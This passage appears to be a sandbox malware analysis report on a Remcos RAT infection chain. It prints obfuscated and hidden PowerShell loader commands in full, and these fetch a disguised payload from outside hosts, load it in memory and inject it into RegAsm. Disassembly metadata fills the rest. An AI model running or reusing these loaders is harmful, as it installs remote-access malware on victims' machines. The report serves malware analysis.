g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#FM#bQBu#Gk#aQBG#Ek#LwBu#Gk#YQBt#C8#cwBk#GE#ZQBo#C8#cwBm#GU#cg#v#GE#bgBu#C8#QQBL#Ek#UwBF#EE#VwBV#EU#SgBJ#C8#bQBv#GM#LgB0#G4#ZQB0#G4#bwBj#HI#ZQBz#HU#YgB1#Gg#d#Bp#Gc#LgB3#GE#cg#v#C8#OgBz#H##d#B0#Gg#Jw#s#C##Jw#w#Cc#L##g#Cc#UwB0#GE#cgB0#HU#c#BO#GE#bQBl#Cc#L##g#Cc#UgBl#Gc#QQBz#G0#Jw#s#C##Jw#w#Cc#KQ#p#H0#fQ#=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:46:52
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:46:53
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.1592934392.000001CFDFD7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:47:03
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x5f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2557660938.0000000000CD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Function 00007FFAACCD37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1767216386.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: fa7faeeee8c1f6fe9b408104da83415c363802fb6bb87f0d4fbc13599a8abb3d
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 9E01847010CB088FD744EF0CE051AA6B3E0FB89320F10052EE58AC3661D622E882CB41

Non-executed Functions

Function 00007FFAACCD044D Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

p08, xrefs: 00007FFAACCD0491
-8, xrefs: 00007FFAACCD04F1
P/8, xrefs: 00007FFAACCD04A1
/8, xrefs: 00007FFAACCD0469
8,8, xrefs: 00007FFAACCD04B1

Memory Dump Source

Source File: 00000002.00000002.1767216386.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaaccd0000_powershell.jbxd

Similarity

API ID:
String ID: 8,8$P/8$p08$-8$/8
API String ID: 0-3573041664
Opcode ID: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
Instruction ID: 1027eed3cd107ff1157b8712ba523d784f0c661191789dd2c294384a14e33224
Opcode Fuzzy Hash: 8836a8fa079be3b6cbe0574690ac3687743f6620024b963507a28e9cf72a9422
Instruction Fuzzy Hash: A7317C8680F7C19FF3178BA818252796FA0AF4360171980FBE08C8F9DB94499D4DC3D6

Analysis Process: RegAsm.exePID: 4512, Parent PID: 8COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.4%
Total number of Nodes:	1230
Total number of Limit Nodes:	77

Executed Functions

Function 00414EED Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 164
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
GetProcAddress.KERNEL32(00000000), ref: 00414F09
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
GetProcAddress.KERNEL32(00000000), ref: 00414F27
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
GetProcAddress.KERNEL32(00000000), ref: 00414F3B
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
GetProcAddress.KERNEL32(00000000), ref: 00414F53
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
GetProcAddress.KERNEL32(00000000), ref: 00414F67
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
GetProcAddress.KERNEL32(00000000), ref: 00414F76
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
GetProcAddress.KERNEL32(00000000), ref: 00414F8A
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
GetProcAddress.KERNEL32(00000000), ref: 00414F9E
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
GetProcAddress.KERNEL32(00000000), ref: 00414FB2
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
GetProcAddress.KERNEL32(00000000), ref: 00414FC6
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
GetProcAddress.KERNEL32(00000000), ref: 00414FDA
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
GetProcAddress.KERNEL32(00000000), ref: 00414FEE
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
GetProcAddress.KERNEL32(00000000), ref: 00415002
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
GetProcAddress.KERNEL32(00000000), ref: 00415016
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
GetProcAddress.KERNEL32(00000000), ref: 00415027
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0040A1F2), ref: 00415038
GetProcAddress.KERNEL32(00000000), ref: 0041503B
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0040A1F2), ref: 0041504C
GetProcAddress.KERNEL32(00000000), ref: 0041504F
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0040A1F2), ref: 00415060
GetProcAddress.KERNEL32(00000000), ref: 00415063
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0040A1F2), ref: 00415074
GetProcAddress.KERNEL32(00000000), ref: 00415077
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0040A1F2), ref: 00415088
GetProcAddress.KERNEL32(00000000), ref: 0041508B
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0040A1F2), ref: 0041509C
GetProcAddress.KERNEL32(00000000), ref: 0041509F
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0040A1F2), ref: 004150AB
GetProcAddress.KERNEL32(00000000), ref: 004150AE
LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0040A1F2), ref: 004150BB
GetProcAddress.KERNEL32(00000000), ref: 004150BE
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0040A1F2), ref: 004150C6
GetProcAddress.KERNEL32(00000000), ref: 004150C9
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0040A1F2), ref: 004150D1
GetProcAddress.KERNEL32(00000000), ref: 004150D4
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0040A1F2), ref: 004150DC
GetProcAddress.KERNEL32(00000000), ref: 004150DF

Strings

NtQueryInformationProcess, xrefs: 0041508D
kernel32, xrefs: 00414F6E, 00414F7D, 00414F91, 00414FB9, 00415009, 0041502E, 004150A6
Shell32, xrefs: 00414FA5
EnumDisplayDevicesW, xrefs: 00414FC8
RmRegisterResources, xrefs: 004150C0
shcore, xrefs: 00414F33
user32, xrefs: 00414F4B, 00414FCD, 00414FE1, 00414FF5
GetSystemTimes, xrefs: 00415004
Shlwapi, xrefs: 0041501A
NtUnmapViewOfSection, xrefs: 00414F5A
SetProcessDEPPolicy, xrefs: 00414FB4
NtResumeProcess, xrefs: 00415051
Rstrtmgr, xrefs: 004150B5, 004150BA, 004150C5, 004150D0, 004150DB
SetProcessDpiAwareness, xrefs: 00414F2E, 00414F46
IsUserAnAdmin, xrefs: 00414FA0
GetConsoleWindow, xrefs: 00415029
RmStartSession, xrefs: 004150B0
NtSuspendProcess, xrefs: 0041503D
Iphlpapi, xrefs: 0041506A, 0041507E
GlobalMemoryStatusEx, xrefs: 00414F69
GetExtendedTcpTable, xrefs: 00415065
RmGetList, xrefs: 004150CB
GetProcessImageFileNameW, xrefs: 00414EF6, 00414F1A
RmEndSession, xrefs: 004150D6
GetMonitorInfoW, xrefs: 00414FF0
Psapi, xrefs: 00414EFB
Kernel32, xrefs: 00414F1F
ntdll, xrefs: 00414F5F, 00415042, 00415056, 00415092
GetFinalPathNameByHandleW, xrefs: 004150A1
GetExtendedUdpTable, xrefs: 00415079
IsWow64Process, xrefs: 00414F78
EnumDisplayMonitors, xrefs: 00414FDC
GetComputerNameExW, xrefs: 00414F8C

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
Instruction ID: d3d602bbfd1a93ba908cf2750ad540eaaa7976be03134fdad1e537fc9d893f35
Opcode Fuzzy Hash: 42f43bac1a948978ef40ac34bead5871a9a47ad840c4e162dcb489b325ed74a5
Instruction Fuzzy Hash: 1D41BBA0E9435876DA107BF25C4EE1F2D5CD965B9A3214937B804931A3E9FC850CCEAF

Function 0040A6C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040CFD6: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 0040CFF6
Part of subcall function 0040CFD6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00467F30), ref: 0040D014
Part of subcall function 0040CFD6: RegCloseKey.KERNEL32(?), ref: 0040D01F

Sleep.KERNEL32(00000BB8), ref: 0040A76B
ExitProcess.KERNEL32 ref: 0040A7CC

Strings

5.2.0 Light, xrefs: 0040A6D6, 0040A74A, 0040A7AE
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040A6D1, 0040A717, 0040A77B
override, xrefs: 0040A6E5

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$override
API String ID: 2281282204-890045707
Opcode ID: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
Instruction ID: 240a189e5f2994f65e702c6cd8730735317bc8827ab5a1e8e31b0d69f5303e7b
Opcode Fuzzy Hash: 81446d6b37e19536808f20368c0a2769ef597eabf70b5911a7188f0c72a157a4
Instruction Fuzzy Hash: BE21A161F1430067C6087A76494B92E3A69AB91719F40853EB501772CBEE7DCE09839F

Function 00401D6F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
timethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLocalTime.KERNEL32(?), ref: 00401D9F
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00401DEB
CreateThread.KERNEL32(00000000,00000000,Function_00001F6E,?,00000000,00000000), ref: 00401DFE

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00401DB2

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: ab6cd12e4c77e3ff0bc5752a9040543b502797b98fb7871ef28a19b8e7a071aa
Instruction ID: 14f6ff0f928cbc8e7ea3c6c14a44142007350dfeddf002f6c212d4b5ee299eb4
Opcode Fuzzy Hash: ab6cd12e4c77e3ff0bc5752a9040543b502797b98fb7871ef28a19b8e7a071aa
Instruction Fuzzy Hash: FE11E3319042847BCB20A77B8C0DEAB7FA89BD3710F04056FF841522A2D6B89485C7A6

Function 0042B1E6 Relevance: 4.5, APIs: 3, Instructions: 33
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000001,?,0042AF9D,00000024,00000006,00000000,00000000), ref: 0042B1FB
CryptGenRandom.ADVAPI32(00000000,00000000,?,?,0042AF9D,00000024,00000006,00000000,00000000,?,?,?,?,?,?,004257BF), ref: 0042B210
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0042AF9D,00000024,00000006,00000000,00000000,?,?,?,?,?,?,004257BF,00000006), ref: 0042B222

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
Instruction ID: ae164a0b830f0c37185ea5edcc456d824eb1b24de8e49cb4941b3ca088d84150
Opcode Fuzzy Hash: 33666291a48df33b97865c7735f96ec22d4ab982dbbf97e17dc0500a6a6ac30a
Instruction Fuzzy Hash: 40F0E535304320FAEB311F11BC08F5B3F58EB86769F600536F215D60E0D652840186AC

Function 00413CEA Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0040A4C5,771B0F10), ref: 00413D07
GetUserNameW.ADVAPI32(?,?), ref: 00413D1F

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
Instruction ID: a952002a6ad584f3fd3bec97d2cc9e930b8157fb69aa19e269c8ae3064c7d3f6
Opcode Fuzzy Hash: b1f2df65207455d77ad9d03485450b695ee0ae644f4d1b8632ad811ce627442e
Instruction Fuzzy Hash: 7501FF7590011CABCB05EBD4DC45EDEBB7CAF44309F10017AB505B7191EEB46B8D8B99

Function 0041EE6D Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 0041EE78

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
Instruction ID: b47cd2b0b3629d5b1c575afa7cea5eba1438416837a73112e9b8902fd82cf9e3
Opcode Fuzzy Hash: 532093c6f76482cd0ae604881977202e10d5a63e0d491930662c20af42320fe7
Instruction Fuzzy Hash: B1C04C79504208BB9B051FA19C18D793B69D785660B008425B90555190D57799509695

Function 0040E92F Relevance: 39.3, APIs: 4, Strings: 18, Instructions: 789
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,00000029,00000000,771B0F10,00467F30), ref: 0040E980
WSAGetLastError.WS2_32(00000000,00000001), ref: 0040EB91
Sleep.KERNEL32(00000000,00000002), ref: 0040F494

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

Strings

X|F, xrefs: 0040EDF4
name, xrefs: 0040ED75
Connection Error: , xrefs: 0040EBA4
TLS On , xrefs: 0040EAF8
| , xrefs: 0040EB17, 0040EC58
TLS Off, xrefs: 0040EAEA
%I64u, xrefs: 0040ECFB
X|F, xrefs: 0040EE38
hlight, xrefs: 0040EDA2
\~F, xrefs: 0040E959
Connecting | , xrefs: 0040EB0D
\~F, xrefs: 0040F45B
Disconnected, xrefs: 0040F414
\~F, xrefs: 0040ED37
5.2.0 Light, xrefs: 0040EED1
Connection Error: Unable to create socket, xrefs: 0040EBEF
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040EDD2
Connected | , xrefs: 0040EC53

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Sleep$ErrorLastLocalTime
String ID: | $%I64u$5.2.0 Light$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $X|F$X|F$\~F$\~F$\~F$hlight$name
API String ID: 524882891-4245088108
Opcode ID: c9c1c96829686e584258ccecebe580d46eaf4c8e35c9a3edde34dd545479c2d1
Instruction ID: b6ca194f84a5d1c98b5920ce75ddcdd8fe9fcf0a86d7d700392620a7e0496257
Opcode Fuzzy Hash: c9c1c96829686e584258ccecebe580d46eaf4c8e35c9a3edde34dd545479c2d1
Instruction Fuzzy Hash: 5D52AD71A002145ACB19F732DD66AEEB3759F90308F5041BFB60A761D2EF781F88CA59

Function 0040A1D6 Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 328
threadsleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F09
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F27
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F3B
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F53
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F67
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F76
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F8A
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414F9E
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FB2
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FC6
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FDA
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00414FEE
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415002
Part of subcall function 00414EED: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415016
Part of subcall function 00414EED: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
Part of subcall function 00414EED: GetProcAddress.KERNEL32(00000000), ref: 00415027

GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040A1FF
CreateThread.KERNEL32(00000000,00000000,00415962,00000000,00000000,00000000), ref: 0040A493
SetProcessDEPPolicy.KERNEL32(00000000,00000000), ref: 0040A4E3
CreateThread.KERNEL32(00000000,00000000,Function_0000A6C0,00000000,00000000,00000000), ref: 0040A4EF
DeleteFileW.KERNEL32(00000000), ref: 0040A5B2

Part of subcall function 0040BE14: __EH_prolog.LIBCMT ref: 0040BE19

Sleep.KERNEL32(0000000A), ref: 0040A5A2

Strings

licence, xrefs: 0040A43B
User, xrefs: 0040A506
Administrator, xrefs: 0040A4FF
Remcos Agent initialized, xrefs: 0040A49A
license_code.txt, xrefs: 0040A261
del, xrefs: 0040A545, 0040A561
Software\, xrefs: 0040A2C4
del, xrefs: 0040A5B8
\~F, xrefs: 0040A271
Exe, xrefs: 0040A310
Access Level: , xrefs: 0040A517
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 0040A1F7
\~F, xrefs: 0040A2A7

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$CreateFileThread$DeleteH_prologNamePolicyProcessSleep
String ID: Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Remcos Agent initialized$Software\$User$\~F$\~F$del$del$licence$license_code.txt
API String ID: 4062606258-4101538746
Opcode ID: 1a2fb5a21dc49659a6c9c268f648253f3852bd4a62c79b0911b4e818184a8f0f
Instruction ID: bf820840e173d3e8500347ecd1b7a27ce46e39732b77903c3f998a6fae3a9d47
Opcode Fuzzy Hash: 1a2fb5a21dc49659a6c9c268f648253f3852bd4a62c79b0911b4e818184a8f0f
Instruction Fuzzy Hash: 66A1903071430067C619BB769D57A6E269A9BC0709F10493FF6467B2C2EEBC9E09825E

Function 0040170E Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,?), ref: 00401726
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00401846
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00401854
WSAGetLastError.WS2_32 ref: 00401867

Part of subcall function 00413BCC: GetLocalTime.KERNEL32(00000000), ref: 00413BE6

Strings

Connection Refused, xrefs: 004018BC
TLS Error 2, xrefs: 0040179B
TLS Error 1, xrefs: 0040177D
TLS Error 3, xrefs: 0040181E
Connection Failed: , xrefs: 00401889
TLS Handshake... | , xrefs: 0040174A
TLS Authentication Failed, xrefs: 004017DF

Memory Dump Source

Source File: 0000000D.00000002.2553536275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
